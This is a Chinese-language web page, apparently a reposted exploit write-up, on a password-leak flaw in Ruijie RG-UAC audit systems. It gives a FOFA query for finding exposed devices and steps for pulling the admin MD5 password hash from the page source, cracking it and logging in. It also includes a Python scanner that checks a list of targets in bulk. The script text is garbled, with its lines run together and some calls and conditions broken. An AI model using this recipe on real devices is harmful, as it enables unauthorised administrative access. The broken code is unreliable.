锐捷 RG

阅读: 评论:0

锐捷 RG

锐捷 RG

0x01 漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台

0x02 漏洞影响

锐捷RG-UAC统一上网行为管理审计系统

0x03 漏洞复现

使用FOFA语句包含关键字查找FOFA语句

title="RG-UAC登录页面" && body="admin"


登录界面

直接CTRL+U查看源代码,搜索password

/ 解密MD5加密的password

即可使用admin,密码登录进系统后台
POC:

import requests
import sys
import random
import re
from requests.ptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+  33[34mPOC_Des:                                    33[0m')print('+  33[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             33[0m')print('+  33[36m使用格式:  python3 poc.py                                            33[0m')print('+  33[36mFile         >>> ip.txt                             33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_urlheaders = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = (url=vuln_url, headers=headers, verify=False, timeout=5)if "super_admin"  and "password"  and response.status_code == 200:print("33[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 33[0m".format(target_url))else:print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))except Exception as e:print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))def Scan(file_name):with open(file_name, "r", encoding='utf8') as scan_url:for url in scan_url:if url[:4] != "http":url = "" + urlurl = url.strip('n')try:POC_1(url)except Exception as e:print("33[31m[x] 请求报错 33[0m".format(e))continueif __name__ == '__main__':title()file_name  = str(input("33[35mPlease input Attack FilenFile >>> 33[0m"))Scan(file_name)

效果如下

免责声明:本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

本文发布于:2024-01-30 01:39:39,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170654998118326.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

上一篇:锐捷RG
标签:锐捷   RG
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23